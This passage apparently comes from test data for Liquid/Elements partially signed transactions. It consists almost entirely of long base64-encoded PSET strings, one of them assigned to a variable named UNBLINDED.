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"
UNBLINDED = "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